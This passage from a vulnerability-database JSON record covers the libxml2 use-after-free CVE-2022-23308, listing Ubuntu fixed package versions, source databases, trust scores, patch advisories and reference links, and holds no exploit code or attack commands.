References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3521\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3712\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps://access.redhat.com/security/cve/CVE-2021-3999\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cve/CVE-2021-23177\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-31566\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-42574\nhttps://access.redhat.com/security/cve/CVE-2021-43565\nhttps://access.redhat.com/security/cve/CVE-2022-23218\nhttps://access.redhat.com/security/cve/CVE-2022-23219\nhttps://access.redhat.com/security/cve/CVE-2022-23308\nhttps://access.redhat.com/security/cve/CVE-2022-23806\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. ==========================================================================\nUbuntu Security Notice USN-5324-1\nMarch 14, 2022\n\nlibxml2 vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nlibxml2 could be made to crash or run programs if it opened a specially\ncrafted file. An\nattacker could use this issue to cause libxml2 to crash, resulting in a\ndenial of service, or possibly execute arbitrary code. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.10:\n libxml2 2.9.12+dfsg-4ubuntu0.1\n libxml2-utils 2.9.12+dfsg-4ubuntu0.1\n\nUbuntu 20.04 LTS:\n libxml2 2.9.10+dfsg-5ubuntu0.20.04.2\n libxml2-utils 2.9.10+dfsg-5ubuntu0.20.04.2\n\nUbuntu 18.04 LTS:\n libxml2 2.9.4+dfsg1-6.1ubuntu1.5\n libxml2-utils 2.9.4+dfsg1-6.1ubuntu1.5\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-23308"
},
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "PACKETSTORM",
"id": "168719"
},
{
"db": "PACKETSTORM",
"id": "167185"
},
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "166304"
}
],
"trust": 1.71
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-412332",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-23308",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "166437",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "168719",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166304",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166327",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167008",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167194",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.2569",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1263",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1677",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0927",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1051",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2411",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4099",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1073",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5782",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3672",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166803",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051708",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031503",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051713",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042138",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072710",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072053",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032843",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072640",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022041523",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051839",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051326",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022030110",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031620",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031525",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032445",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022053128",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "167185",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "166431",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166433",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167188",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167189",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167184",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167193",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167186",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-412332",
"trust": 0.1
},
{
"db": "ICS CERT",
"id": "ICSA-23-348-10",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-23308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166805",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166489",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "PACKETSTORM",
"id": "168719"
},
{
"db": "PACKETSTORM",
"id": "167185"
},
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "166304"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"id": "VAR-202202-0906",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:00:24.071000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libxml2 Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=184325"
},
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2022-23308: Use-after-free of ID and IDREF attributes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=9ebc8e6cd9474a4b501cffe479738815"
},
{
"title": "Ubuntu Security Notice: USN-5422-1: libxml2 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5422-1"
},
{
"title": "Red Hat: Moderate: libxml2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220899 - Security Advisory"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1826",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1826"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-23308"
},
{
"title": "Google Chrome: Long Term Support Channel Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=chrome_releases\u0026qid=d941b22c6938f31887f0b0d1ec5e74d8"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP11 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221390 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP11 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221389 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-198",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-198"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-068",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-068"
},
{
"title": "Google Chrome: Long Term Support Channel Update for ChromeOS",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=chrome_releases\u0026qid=e0755e202be7c03d6f4e14fbc744c5b2"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221039 - Security Advisory"
},
{
"title": "Amazon Linux AMI: ALAS-2023-1743",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2023-1743"
},
{
"title": "Apple: watchOS 8.6",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=6bd411659b23f6a36cfd1c59cf69e092"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221041 - Security Advisory"
},
{
"title": "Red Hat: Low: Release of OpenShift Serverless Version 1.22.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221747 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221042 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221734 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.8 security and container updates",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221083 - Security Advisory"
},
{
"title": "Apple: iOS 15.5 and iPadOS 15.5",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=f66f27c9aed3f1df2b9271d627617604"
},
{
"title": "Red Hat: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221081 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.3 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221476 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.5.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221396 - Security Advisory"
},
{
"title": "Apple: macOS Monterey 12.4",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=73857ee26a600b1527481f1deacc0619"
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/AlphabugX/CVE-2022-23305 "
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/AlphabugX/CVE-2022-RCE "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-416",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://security.gentoo.org/glsa/202210-03"
},
{
"trust": 1.8,
"url": "https://github.com/gnome/libxml2/commit/652dd12a858989b14eed4e84e453059cd3ba340e"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220331-0008/"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213253"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213254"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213255"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213256"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213257"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213258"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/34"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/38"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/35"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/33"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/36"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/37"
},
{
"trust": 1.8,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/blob/v2.9.13/news"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00004.html"
},
{
"trust": 1.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23308"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/la3mwwayzadwj5f6joubx65uzamqb7rf/"
},
{
"trust": 1.0,
"url": "https://access.redhat.com/security/cve/cve-2022-23308"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/la3mwwayzadwj5f6joubx65uzamqb7rf/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051713"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2569"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072710"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051839"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1051"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1073"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072053"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4099"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5782"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166803/red-hat-security-advisory-2022-1390-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/libxml2-five-vulnerabilities-37614"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032843"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166304/ubuntu-security-notice-usn-5324-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022053128"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167194/apple-security-advisory-2022-05-16-6.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2411"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032445"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051326"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-23308/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1263"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072640"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051708"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042138"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022041523"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168719/gentoo-linux-security-advisory-202210-03.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022030110"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0927"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3672"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031503"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031525"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167008/red-hat-security-advisory-2022-1747-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166327/red-hat-security-advisory-2022-0899-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166437/red-hat-security-advisory-2022-1039-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031620"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23219"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23218"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3999"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/416.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1006489"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5422-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-348-10"
},
{
"trust": 0.1,
"url": "https://alas.aws.amazon.com/al2/alas-2022-1826.html"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26738"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26740"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22677"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26731"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26744"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26702"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213258."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26736"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4142"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://www.apple.com/itunes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26706"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26739"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26711"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0899"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22825"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1025"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25315"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22823"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22822"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22823"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22826"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22824"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45960"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24731"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22822"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46143"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3999"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25236"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24730"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25315"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-46143"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22825"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24731"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25235"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-45960"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24730"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22826"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1025"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25236"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1389"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3517"
},
